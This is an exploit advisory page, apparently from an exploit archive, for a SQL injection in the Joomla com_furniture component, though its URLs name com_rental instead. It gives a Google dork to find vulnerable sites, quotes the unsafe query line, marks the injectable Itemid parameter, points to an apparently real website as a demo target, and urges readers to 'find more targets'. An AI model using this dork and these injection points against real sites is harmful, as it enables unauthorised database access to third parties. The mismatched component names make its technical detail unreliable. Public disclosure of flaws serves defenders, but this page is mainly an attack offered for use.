Joomla com_furniture SQL Injection

2016.01.20
Credit: Dz MinD Injector
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

### # Title : Exploit Joomla com_furniture Sql Injection # Author : Dz MinD Injector # Home : Algeria 23000 d^_^b # FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector # Type : proof of concept # Tested on : Windows7 & Linux # Date : 18/01/2016 ### # <?php # echo " Freedom t0 Palastine " ; # ?> # Lov3 Explo8ting Just For Fun ! ######## [ Proof / Exploit ] ################|=> #! Google Dork : #+ inurl:com_furniture hp-code :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: $query = "SELECT * FROM ".$db->quote_id($_GET['table'])." WHERE ROWID = ".$pks[$j]; ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: /index.php?option=com_rental&task=viewDetails&view=rental&id=40&year=1943&Itemid=[ Inject Here ] http://localhost//index.php?option=com_rental&task=viewDetails&view=rental&id=40&year=1943&Itemid=[ Inject Here ] ##Demo : http://www.nerjahoXlidayrentals.com/index.php?option=com_rental&task=viewDetails&view=rental&id=40&year=1943&Itemid=10%27 !+ Find More targets in Google ^_^ !+ Greetings to my Friends : Sige-Dz , Sami Joker , Vatou-Dz & All Algerian Hackerz !


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top